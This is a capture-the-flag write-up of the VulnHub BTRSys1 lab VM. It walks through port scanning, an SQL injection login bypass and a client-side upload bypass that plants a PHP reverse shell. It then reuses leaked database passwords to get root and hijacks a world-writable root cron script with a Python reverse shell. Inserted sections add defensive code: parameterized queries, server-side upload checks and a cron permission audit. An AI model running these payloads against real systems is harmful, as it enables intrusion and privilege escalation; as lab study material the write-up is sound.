vulnhub BTRSys1 notes
BTRSys1
Service enumeration
```
# nmap -p- 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds

# nmap -p21,22,80 -sV --version-all 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
```
Points of interest
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
Details
[port 21] ftp vsftpd 3.0.2
```
# searchsploit vsftp
------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                    |  Path
                                                                  | (/usr/share/exploitdb/)
------------------------------------------------------------------ ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption    | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)    | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)    | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                  | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)            | exploits/unix/remote/17491.rb
------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result
```
vsftpd looks unlikely to be of much use from here on, either.
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
```
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution       | exploits/linux/remote/45001.py
```
It felt like something might work here, but there is no SFTP, and I don't know any SSH usernames.
[port 80] http Apache httpd 2.4.7 (Ubuntu)
```
# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        80
+ Start Time:         2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.12

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat May  9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://10.10.10.12/javascript/
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.10.10.12/uploads/

---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/

---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)

-----------------
END_TIME: Sat May  9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4
```
Nothing in particular seems to be wrong with Apache or PHP themselves.
There are various directories, but nothing that stands out,
although "/uploads/" can only be described as suspicious.
config.php cannot be read by simply requesting it.
login.php doesn't look like it will accept random guesses.
However,
```
# curl 10.10.10.12/login.php
(snip)
<div class="login-box">
  <div class="lb-header">
    <a href="#" class="active" id="login-box-link">Giris Yap</a>
  </div>
  <form method="Post" name="loginform" action="personel.php" class="email-login">
    <div class="u-form-group">
      <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/>
    </div>
    <div class="u-form-group">
      <input type="password" id="pwd" name="parola" placeholder="Parola" required/>
    </div>
    <div class="u-form-group">
      <input type="button" value="Giris" onclick="control();" />
    </div>
  </form>
</div>
<script type="text/javascript">
function control(){
  var user = document.getElementById("user").value;
  var pwd = document.getElementById("pwd").value;
  var str=user.substring(user.lastIndexOf("@")+1,user.length);
  if((pwd == "'")){
    alert("Hack Denemesi !!!");
  } else if (str!="btrisk.com"){
    alert("Yanlis Kullanici Bilgisi Denemektesiniz");
  } else{
    document.loginform.submit();
  }
}
</script>
```
If the password contains a single quote it is rejected,
and unless the email address contains "@btrisk.com" it isn't let through.
So as long as those two conditions are met, it looks like any arbitrary value logs you in?
The page it then goes to is
```
# curl 10.10.10.12/personel.php
(snip)
<script type="text/javascript">
// accept=".jpg,.png"
function getFile(){
  var filename = document.getElementById("dosya").value;
  var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
  if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
    document.myform.submit();
  }else{
    //mesaj
    alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
    return false;
  }
}
</script>
```
There is a file upload script?
I couldn't find a button or anything else that triggers the script.
Back to login.php once more.
After trying various logins, I found that a single quote can be used in front of "@btrisk.com".
Entering "' or '1'='1'-- @btrisk.com" as the email address, the SQLi appears to have gone through.
Once the SQLi worked I was logged in, and found the button that calls getFile().
The reverse-shell PHP is the usual pentestmonkey one, "/usr/share/webshells/php/php-reverse-shell.php".
Trying to upload the reverse-shell PHP file is refused because it isn't jpg, gif or png.
However, the "it must be an image file" decision is made by JavaScript on the client side, not on the server, so it can be bypassed by tampering with getFile() from the browser console.
In my case, after selecting the file in the file chooser, I ran "document.myform.submit();" from the browser console, and that uploaded it.
So, where does the uploaded file end up?
Naturally, it has to be "/uploads/".
Sure enough, checking after the upload, the file is there.
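Added example, not code from the page or from the BTRsys1 application: a Python/SQLite model of the login logic above. The client-side check is a port of the control() function shown earlier, the server-side query shape is an assumption (sorgu.php is never shown on the page), and the sample rows are constructed. It shows why the payload passes the browser check, matches every row when the SQL is built from strings, and matches nothing once the same lookup uses bound parameters.

```python
import sqlite3

# Constructed sample rows modelled on the page's deneme.user table: only the two
# columns the login needs, with placeholder passwords rather than the real ones.
SAMPLE_USERS = [
    ("ikaya@btrisk.com", "placeholder-pw-1"),
    ("cdmir@btrisk.com", "placeholder-pw-2"),
]

# The value the page enters as the email address.
PAYLOAD_USER = "' or '1'='1'-- @btrisk.com"

def make_db():
    """In-memory SQLite stand-in for the target's MySQL 'user' table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (Kullanici_Adi TEXT, Parola TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return con

def client_side_control(user, pwd):
    """Python port of the page's control() JavaScript: it rejects only a password
    that is exactly one quote and a user whose text after the last '@' is not
    btrisk.com. Quotes before the '@' are never examined, and the check runs
    in the browser, so it is not a defence at all."""
    domain = user[user.rfind("@") + 1:]
    return pwd != "'" and domain == "btrisk.com"

def login_vulnerable(con, user, pwd):
    """Assumed shape of the server-side lookup (sorgu.php is not shown on the
    page): SQL built by string formatting, so the payload's quote closes the
    literal and '-- ' comments out the password comparison."""
    sql = ("SELECT Kullanici_Adi FROM user WHERE Kullanici_Adi='%s' AND Parola='%s'"
           % (user, pwd))
    return [row[0] for row in con.execute(sql)]

def login_safe(con, user, pwd):
    """Same lookup with bound parameters: the payload is compared as a plain
    string value and matches no row."""
    sql = "SELECT Kullanici_Adi FROM user WHERE Kullanici_Adi=? AND Parola=?"
    return [row[0] for row in con.execute(sql, (user, pwd))]

if __name__ == "__main__":
    con = make_db()
    print("client check passes payload :", client_side_control(PAYLOAD_USER, "x"))
    print("string-built query returns  :", login_vulnerable(con, PAYLOAD_USER, "x"))
    print("parameterized query returns :", login_safe(con, PAYLOAD_USER, "x"))
```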
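Added example (not the page's or the application's code): the same jpg/gif/png rule that getFile() applies, moved to the server in Python where the browser console cannot skip it, plus a leading-bytes check and a server-chosen filename. Function names and the sample inputs are constructed; the upload directory must additionally be served without PHP execution, which /uploads/ here was not.

```python
import re

# The page's getFile() allow-list, now enforced on the server, each type paired
# with the leading bytes a genuine file of that type starts with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def last_extension(filename):
    """Mirror of the page's /[^.]+$/ rule: the text after the final dot,
    lower-cased; None when there is no dot or nothing follows it."""
    m = re.search(r"[^.]+$", filename)
    return m.group(0).lower() if ("." in filename and m) else None

def check_upload(filename, data):
    """Return (accepted, reason). The name and the file's first bytes must both
    say the same image type, so reverse.php and a PHP file renamed to .jpg are
    refused regardless of what the browser-side script was told."""
    ext = last_extension(filename)
    if ext not in ALLOWED:
        return False, "extension %r is not jpg, gif or png" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not start like a %s file" % ext
    return True, "ok"

def stored_name(filename, serial):
    """Name the file on disk ourselves (a serial plus the validated extension),
    after check_upload accepted it, so the client-supplied name never reaches
    the filesystem."""
    return "%08d.%s" % (serial, last_extension(filename))

if __name__ == "__main__":
    # Constructed inputs: a PHP file, the same bytes with a .jpg name, a JPEG header.
    for name, blob in (("reverse.php", b"<?php echo 1; ?>"),
                       ("reverse.php.jpg", b"<?php echo 1; ?>"),
                       ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF")):
        print(name, check_upload(name, blob))
```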
shell getchu!
```
window 1
# nc -nlvp 443

window 2
# curl 10.10.10.12/uploads/reverse.php

window 1
Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 19:00:23 up 11:28,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```
Incidentally, "/javascript/" was "Forbidden",
but "/javascript/jquery/jquery" and "/javascript/jquery/version" return 200 for some reason.
after shell getchu
Using the credentials in the SQL database
First, let's look at "config.php", which couldn't be read earlier.
```
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
ls
assets      gonder.php      index.php  personel.php  uploads
config.php  hakkimizda.php  login.php  sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
{
    echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
}
/////////////////////////////////////////////////////////////////////////////////////////
?>
www-data@BTRsys1:/var/www/html$
```
Could this be a root takeover through MySQL running as root?
```
www-data@BTRsys1:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select sys_exec("id");
select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist
```
That wasn't the case, so let's look around.
```
mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use information_schema;
use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql> select * from user;
select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)

mysql>
```
This looks like information that could be put to use, doesn't it?
```
www-data@BTRsys1:/var/www/html$ su -
su -
Password: asd123***
root@BTRsys1:~# id
id
uid=0(root) gid=0(root) groups=0(root)
```
root shell getchu!!
Looking at cron
I came across an interesting command, "find / -perm -2 -type f 2>/dev/null" (it lists every file with the world-writable bit set), so let's try it right away.
```
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type f 2>/dev/null
/var/tmp/cleaner.py.swp
/var/log/cronlog
(snip)
/lib/log/cleaner.py
```
Most of the results don't matter, but I found something interesting.
What on earth are "/var/log/cronlog" and "/lib/log/cleaner.py"?
```
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog
cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
ls -al /lib/log/ | grep cleaner
-rwxrwxrwx 1 root root 96 Aug 13  2014 cleaner.py
```
Rewriting "cleaner.py" gets root.
This time I rewrite it to the following.
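Added example (not the page's code): a small Python audit for exactly the condition found here, a cron job run by root whose script is world-writable. It parses user-crontab lines like the one in /var/log/cronlog, resolves the command (bare names through an assumed search list, standing in for the PATH cron would use), and flags scripts with the other-write bit set or an unexpected owner; demo() rebuilds the 0777 cleaner.py in a temporary directory with constructed contents.

```python
import os
import stat
import tempfile

# Constructed crontab text in the shape of the page's /var/log/cronlog entry.
SAMPLE_CRONTAB = "*/2 * * * * cleaner.py\n"

def resolve(command, search_dirs):
    """Locate the script a cron entry runs: absolute paths as given, bare names
    through the caller-supplied directories (an assumption standing in for the
    PATH cron would use)."""
    if os.path.isabs(command):
        return command if os.path.exists(command) else None
    for d in search_dirs:
        p = os.path.join(d, command)
        if os.path.exists(p):
            return p
    return None

def audit_crontab(text, search_dirs, trusted_uid=0):
    """Return (script, problem) pairs for jobs whose script an unprivileged user
    could replace: world-writable, or not owned by the trusted uid (root)."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue  # blank, comment, or not a five-field schedule line
        script = resolve(fields[5], search_dirs)
        if script is None:
            findings.append((fields[5], "command not found"))
            continue
        st = os.stat(script)
        if st.st_mode & stat.S_IWOTH:
            findings.append((script, "world-writable (%o)" % (st.st_mode & 0o777)))
        if st.st_uid != trusted_uid:
            findings.append((script, "owned by uid %d, not %d" % (st.st_uid, trusted_uid)))
    return findings

def demo():
    """Build a throwaway directory holding a 0777 cleaner.py like the one on
    BTRsys1 plus a correctly permissioned sibling, then audit a crontab that
    runs both. The files are owned by us, so our uid is the trusted one here."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "cleaner.py"), os.path.join(d, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return audit_crontab(SAMPLE_CRONTAB + "0 3 * * * %s\n" % good, [d], os.getuid())
```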
```
#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("LHOST",LPORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
"LHOST" and "LPORT" are whatever you prefer.
```
attacker
# python -m SimpleHTTPServer 80
```
```
victim
www-data@BTRsys1:/var/www/html$ cd /lib/log
cd /lib/log
www-data@BTRsys1:/lib/log$ cd /tmp
cd /tmp
www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-09 20:03:17--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: 'getroot.py'

100%[======================================>] 238         --.-K/s   in 0s

2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238]

www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py
cp ./getroot.py /lib/log/cleaner.py
www-data@BTRsys1:/tmp$
```
```
attacker (waiting for cron)
# nc -nlvp 8080
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.12.
Ncat: Connection from 10.10.10.12:56889.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```
Under "/tmp", with unlucky timing the file could be deleted by cleaner.py, so it may be better to work in "/var/www/html/uploads".
Lessons learned
- "find / -perm -2 -type f 2>/dev/null" is magnificent, isn't it!?